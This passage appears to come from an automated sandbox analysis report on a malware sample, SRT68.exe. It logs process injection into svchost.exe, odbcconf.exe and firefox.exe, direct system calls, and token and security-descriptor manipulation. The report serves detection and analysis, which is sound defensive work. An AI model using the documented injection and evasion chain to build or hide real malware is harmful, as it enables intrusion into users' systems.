                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h] | 2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00FF80A9
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FCA155
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCA124 SetUnhandledExceptionFilter,0_2_00FCA124

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\SRT68.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\odbcconf.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\odbcconf.exe Section loaded: NULL target: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe protection: read write
                Source: C:\Windows\SysWOW64\odbcconf.exe Section loaded: NULL target: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\odbcconf.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\odbcconf.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\odbcconf.exe Thread register set: target process: 7888
                Source: C:\Windows\SysWOW64\odbcconf.exe Thread APC queued: target process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                Source: C:\Users\user\Desktop\SRT68.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B83008
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FF87B1 LogonUserW
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_01004C27 mouse_event
                Source: C:\Users\user\Desktop\SRT68.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SRT68.exe"
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe Process created: C:\Windows\SysWOW64\odbcconf.exe "C:\Windows\SysWOW64\odbcconf.exe"
                Source: C:\Windows\SysWOW64\odbcconf.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: SRT68.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
